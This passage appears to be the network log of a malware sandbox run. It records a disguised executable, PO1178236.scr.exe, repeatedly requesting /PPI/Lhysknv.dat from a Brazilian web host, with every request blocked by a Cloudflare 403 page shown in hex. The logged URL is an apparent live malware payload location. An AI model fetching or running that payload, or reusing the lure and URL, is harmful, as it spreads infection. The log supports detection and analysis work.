        Expires: Thu, 09 Jan 2025 07:37:01 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G0GzG872XCovz88l3KqSx049KdywcxRbumSGbaTpoMJqO8YJNPgr%2B9tyw0EYI7592hsYraunqSgpiD%2BC4qV%2BnNU%2FogCru%2FcqvQtuvit4qgXVqGlSYRPK7ZfDJx3v4s%2Bun%2FIsAC6qkf41YPiO"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c219bff20f41-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1490&min_rtt=1488&rtt_var=562&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1938911&cwnd=145&unsent_bytes=0&cid=a9a305bc1a2ac3a1&ts=127&x=0"
        2025-01-09 07:36:46 UTC356INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:46 UTC1369INData Raw: 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69
        Data Ascii: Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="wi
        2025-01-09 07:36:46 UTC1369INData Raw: 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d
        Data Ascii: ection cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>...
        2025-01-09 07:36:46 UTC1369INData Raw: 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 31 39 62 66 66 32 30 66 34 31 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a
        Data Ascii: m:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c219bff20f41</strong></span> <span class="cf-footer-separator sm:
        2025-01-09 07:36:46 UTC1006INData Raw: 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 31 39 62 66 66 32 30 66 34 31 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 77 4e 69 34 77 4d 44 41 77 4d 44 41 3d
        Data Ascii: > window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c219bff20f41',t:'MTczNjQwODIwNi4wMDAwMDA=
        2025-01-09 07:36:46 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        81192.168.2.949789188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:46 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:47 UTC1003INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:46 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:01 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UOIcXYDmKIDukrxoJeNRjeVrffWT196JNd9NObsewHs51wOfaoFv8x135xnA0h9EOVB6VWFJXCEkgUYz4Yet6Kyx1SJt83Uwb1klcULG20fNMdZ%2BIc496b1AGTJIDpFLEPJQURmgxw%2BYL5R6"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c21d89be19cb-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1890&min_rtt=1884&rtt_var=718&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1511387&cwnd=248&unsent_bytes=0&cid=69cc173e47c905a4&ts=148&x=0"
        2025-01-09 07:36:47 UTC366INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:47 UTC1369INData Raw: 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65
        Data Ascii: e</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device
        2025-01-09 07:36:47 UTC1369INData Raw: 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61
        Data Ascii: highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha
        2025-01-09 07:36:47 UTC1369INData Raw: 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 31 64 38 39 62 65 31 39 63 62 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62
        Data Ascii: t border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c21d89be19cb</strong></span> <span class="cf-footer-separator sm:hidden">&b
        2025-01-09 07:36:47 UTC996INData Raw: 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 31 64 38 39 62 65 31 39 63 62 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 77 4e 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64
        Data Ascii: ._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c21d89be19cb',t:'MTczNjQwODIwNi4wMDAwMDA='};var a=d
        2025-01-09 07:36:47 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        82192.168.2.949790188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:47 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:47 UTC1011INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:47 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:02 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0lMdLbg2Yh8jAYdPLe8m0eE%2BYJvVfIjbVrqzJTH0hjr5Feyjn%2BZdLp%2F33MURqq1zTrNuwEHzrzHdUIbguvvo1mIDBVvJ2%2FK%2BCBbxH60GIl9BiojxnLOfGT5m%2FLuyjvdFVvYEzIUIhMECun8o"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c2214ab4726e-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1928&min_rtt=1927&rtt_var=726&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1505154&cwnd=224&unsent_bytes=0&cid=1a061b1eafecfda3&ts=137&x=0"
        2025-01-09 07:36:47 UTC358INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:47 UTC1369INData Raw: 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74
        Data Ascii: loudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="widt
        2025-01-09 07:36:47 UTC1369INData Raw: 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f
        Data Ascii: tion cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /
        2025-01-09 07:36:47 UTC1369INData Raw: 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 32 31 34 61 62 34 37 32 36 65 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69
        Data Ascii: text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2214ab4726e</strong></span> <span class="cf-footer-separator sm:hi
        2025-01-09 07:36:47 UTC1004INData Raw: 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 32 31 34 61 62 34 37 32 36 65 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 77 4e 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2214ab4726e',t:'MTczNjQwODIwNy4wMDAwMDA='}
        2025-01-09 07:36:47 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        83192.168.2.949792188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:48 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:48 UTC1008INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:48 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:03 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uSGAhhwZomgFyviCl4iTNYYD6HEyXZiALOvuoryDrwd3gg9%2B%2FD34UzE9CNbyj%2F0n3A9c89ml%2By1lJSFKtRIuGgosolP9YROoUyayt3dnLOpJ0RB%2FmImpA9xO3KYNIZHXfP8I3rpdhxdA5P8c"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c224f9f2c35e-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1463&min_rtt=1455&rtt_var=562&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1919789&cwnd=59&unsent_bytes=0&cid=06dae848ddde4783&ts=149&x=0"
        2025-01-09 07:36:48 UTC361INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
